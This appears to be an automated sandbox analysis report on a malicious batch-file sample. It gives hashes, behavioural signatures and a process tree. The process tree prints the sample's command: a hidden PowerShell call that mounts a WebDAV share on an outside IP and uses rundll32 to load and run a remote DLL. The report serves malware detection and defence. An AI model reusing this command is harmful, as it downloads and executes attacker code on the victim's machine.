Analysis
-
max time kernel
107s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
14/07/2024, 02:22
Static task
static1
Behavioral task
behavioral1
Sample
17263257632860332454.bat
Resource
win7-20240704-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
17263257632860332454.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
17263257632860332454.bat
-
Size
2KB
-
MD5
3086b950cedbb150786fd3aaf21c5afd
-
SHA1
782e981b35c51587c4e5b98584b5f789d3879e0c
-
SHA256
e4234be5b3e79fe0f39a7beceebe84acc5ca87ab3499099ddb2fe4b386f5cd8d
-
SHA512
aecc7ef848c7f85c7f67fcf20ad8973a17927c268dfcf347ff2af5cbecd23f20e65f1846b5de4e4c55d78493a1141ded3c79dbd6c042493974cb631362d68030
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2956 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2956 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2944 wordpad.exe 2944 wordpad.exe 2944 wordpad.exe 2944 wordpad.exe 2944 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2944 2780 cmd.exe 31 PID 2780 wrote to memory of 2944 2780 cmd.exe 31 PID 2780 wrote to memory of 2944 2780 cmd.exe 31 PID 2780 wrote to memory of 2956 2780 cmd.exe 32 PID 2780 wrote to memory of 2956 2780 cmd.exe 32 PID 2780 wrote to memory of 2956 2780 cmd.exe 32 PID 2956 wrote to memory of 2896 2956 powershell.exe 34 PID 2956 wrote to memory of 2896 2956 powershell.exe 34 PID 2956 wrote to memory of 2896 2956 powershell.exe 34 PID 2956 wrote to memory of 484 2956 powershell.exe 35 PID 2956 wrote to memory of 484 2956 powershell.exe 35 PID 2956 wrote to memory of 484 2956 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\17263257632860332454.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\1645.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2896
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\1645.dll entry3⤵PID:484
-
-